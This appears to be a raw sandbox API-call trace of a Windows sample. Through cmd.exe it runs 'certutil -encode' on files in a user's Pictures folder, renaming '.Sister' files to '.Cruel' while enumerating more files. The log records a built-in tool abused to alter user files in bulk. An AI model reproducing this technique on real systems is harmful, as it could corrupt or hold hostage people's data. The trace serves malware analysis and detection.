GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.938] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0294.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.938] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0294.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.939] GetFileType (hFile=0x50) returned 0x2 [0294.939] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.939] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0294.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.939] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937a060*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed937a060*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0294.940] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.gif.Cruel\" ") returned 68 [0294.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.940] GetFileType (hFile=0x50) returned 0x2 [0294.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.941] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0294.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.942] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x44) returned 1 [0294.942] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0294.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.943] GetFileType (hFile=0x50) returned 0x2 [0294.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.943] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0294.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.943] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0294.948] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0294.949] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0294.949] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0294.949] malloc (_Size=0xffce) returned 0x21eda100000 [0294.949] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0294.949] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0294.949] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0294.949] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0294.949] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0294.949] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0294.949] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0294.949] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0294.949] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0294.949] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0294.949] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0294.949] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0294.950] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0294.951] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0294.951] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0294.951] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0294.951] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0294.951] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0294.951] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0294.951] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0294.951] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0294.952] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0294.952] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0294.952] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0294.952] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0294.952] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0294.952] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0294.952] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0294.952] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0294.952] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0294.952] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0294.952] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0294.952] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0294.952] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0294.952] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0294.952] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0294.952] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0294.952] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0294.952] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0294.952] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0294.952] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0294.952] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0294.952] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0294.952] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0294.952] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0294.952] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0294.952] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0294.952] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0294.953] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0294.953] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0294.953] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0294.953] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0294.953] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0294.953] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0294.953] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0294.953] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0294.953] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0294.953] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0294.953] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0294.953] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0294.953] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0294.953] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0294.953] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0294.953] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0294.953] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0294.953] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0294.953] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0294.953] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0294.953] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0294.953] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0294.953] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0294.953] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0294.953] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0294.953] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0294.953] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0294.953] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0294.954] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0294.954] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0294.954] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0294.954] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0294.954] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0294.954] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0294.954] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0294.954] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0294.954] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0294.954] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0294.954] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0294.954] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0294.954] ??_V@YAXPEAX@Z () returned 0x1 [0294.954] GetProcessHeap () returned 0x21ed8c70000 [0294.954] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8c96fb0 [0294.954] GetProcessHeap () returned 0x21ed8c70000 [0294.954] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaa) returned 0x21ed8c96100 [0294.954] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0294.955] malloc (_Size=0xffce) returned 0x21eda100000 [0294.955] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0294.955] GetProcessHeap () returned 0x21ed8c70000 [0294.955] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8ca6fa0 [0294.956] SetErrorMode (uMode=0x0) returned 0x0 [0294.956] SetErrorMode (uMode=0x1) returned 0x0 [0294.956] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8ca6fb0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0294.956] SetErrorMode (uMode=0x0) returned 0x1 [0294.956] GetProcessHeap () returned 0x21ed8c70000 [0294.956] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ca6fa0, Size=0x54) returned 0x21ed8ca6fa0 [0294.956] GetProcessHeap () returned 0x21ed8c70000 [0294.956] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ca6fa0) returned 0x54 [0294.956] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0294.956] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0294.956] GetProcessHeap () returned 0x21ed8c70000 [0294.956] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed8d65170 [0294.956] GetProcessHeap () returned 0x21ed8c70000 [0294.956] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d42d70 [0294.956] GetProcessHeap () returned 0x21ed8c70000 [0294.956] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d42d70, Size=0x1c0) returned 0x21ed8d64c00 [0294.957] GetProcessHeap () returned 0x21ed8c70000 [0294.957] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64c00) returned 0x1c0 [0294.957] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0294.957] GetProcessHeap () returned 0x21ed8c70000 [0294.957] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c7c550 [0294.957] GetProcessHeap () returned 0x21ed8c70000 [0294.957] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c550, Size=0x7e) returned 0x21ed8c7c550 [0294.957] GetProcessHeap () returned 0x21ed8c70000 [0294.957] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c550) returned 0x7e [0294.957] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.957] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0294.957] GetLastError () returned 0x2 [0294.957] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.958] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0294.958] GetLastError () returned 0x2 [0294.958] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.958] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd00 [0294.958] FindClose (in: hFindFile=0x21ed8c7cd00 | out: hFindFile=0x21ed8c7cd00) returned 1 [0294.959] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0294.959] GetLastError () returned 0x2 [0294.959] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd60 [0294.959] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0294.959] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0294.959] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0294.959] ??_V@YAXPEAX@Z () returned 0x1 [0294.959] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0294.960] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0294.960] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0294.960] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0294.960] GetProcessHeap () returned 0x21ed8c70000 [0294.960] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45ce0 [0294.960] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0294.960] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0294.960] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0294.960] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0294.960] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0294.960] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0294.960] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0294.960] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0294.961] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0294.961] GetProcessHeap () returned 0x21ed8c70000 [0294.962] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45ce0) returned 1 [0294.962] GetProcessHeap () returned 0x21ed8c70000 [0294.962] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95600 [0294.962] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0294.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.962] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0294.962] _get_osfhandle (_FileHandle=0) returned 0x4c [0294.962] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0294.962] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.gif.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"CBqE_ptIfCfIXOkQ.gif.Sister\" \"CBqE_ptIfCfIXOkQ.gif.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x11d8, dwThreadId=0xfb0)) returned 1 [0294.973] CloseHandle (hObject=0xa4) returned 1 [0294.973] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0294.973] GetProcessHeap () returned 0x21ed8c70000 [0294.973] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60f30) returned 1 [0294.973] GetEnvironmentStringsW () returned 0x21ed8d44630* [0294.973] GetProcessHeap () returned 0x21ed8c70000 [0294.973] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0294.974] FreeEnvironmentStringsA (penv="=") returned 1 [0294.974] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0295.586] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0295.586] CloseHandle (hObject=0xa8) returned 1 [0295.586] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0295.586] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0295.586] GetProcessHeap () returned 0x21ed8c70000 [0295.587] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0295.587] GetEnvironmentStringsW () returned 0x21ed8d44630* [0295.587] GetProcessHeap () returned 0x21ed8c70000 [0295.587] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0295.587] FreeEnvironmentStringsA (penv="=") returned 1 [0295.587] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0295.587] GetProcessHeap () returned 0x21ed8c70000 [0295.587] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d603e0) returned 1 [0295.587] GetEnvironmentStringsW () returned 0x21ed8d44630* [0295.587] GetProcessHeap () returned 0x21ed8c70000 [0295.587] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8d603e0 [0295.588] FreeEnvironmentStringsA (penv="=") returned 1 [0295.588] GetProcessHeap () returned 0x21ed8c70000 [0295.588] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95600) returned 1 [0295.588] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0295.588] ??_V@YAXPEAX@Z () returned 0x1 [0295.588] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c00470, ftCreationTime.dwHighDateTime=0x1d5e3de, ftLastAccessTime.dwLowDateTime=0x7d12ada0, ftLastAccessTime.dwHighDateTime=0x1d5e8ad, ftLastWriteTime.dwLowDateTime=0x7d12ada0, ftLastWriteTime.dwHighDateTime=0x1d5e8ad, nFileSizeHigh=0x0, nFileSizeLow=0xe23a, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="Cm2WieoPB7gN.png.Sister", cAlternateFileName="")) returned 1 [0295.588] GetProcessHeap () returned 0x21ed8c70000 [0295.588] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d65bb0, Size=0xba) returned 0x21ed8d6aca0 [0295.588] GetProcessHeap () returned 0x21ed8c70000 [0295.588] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6aca0) returned 0xba [0295.588] GetProcessHeap () returned 0x21ed8c70000 [0295.588] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d55f00 [0295.588] GetProcessHeap () returned 0x21ed8c70000 [0295.588] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55f00, Size=0x58) returned 0x21ed8d55f00 [0295.589] GetProcessHeap () returned 0x21ed8c70000 [0295.589] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d55f00) returned 0x58 [0295.589] GetProcessHeap () returned 0x21ed8c70000 [0295.589] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d55f70 [0295.589] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0295.589] GetProcessHeap () returned 0x21ed8c70000 [0295.589] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bda0 [0295.589] ??_V@YAXPEAX@Z () returned 0x1 [0295.589] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0295.589] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0295.589] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0295.590] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 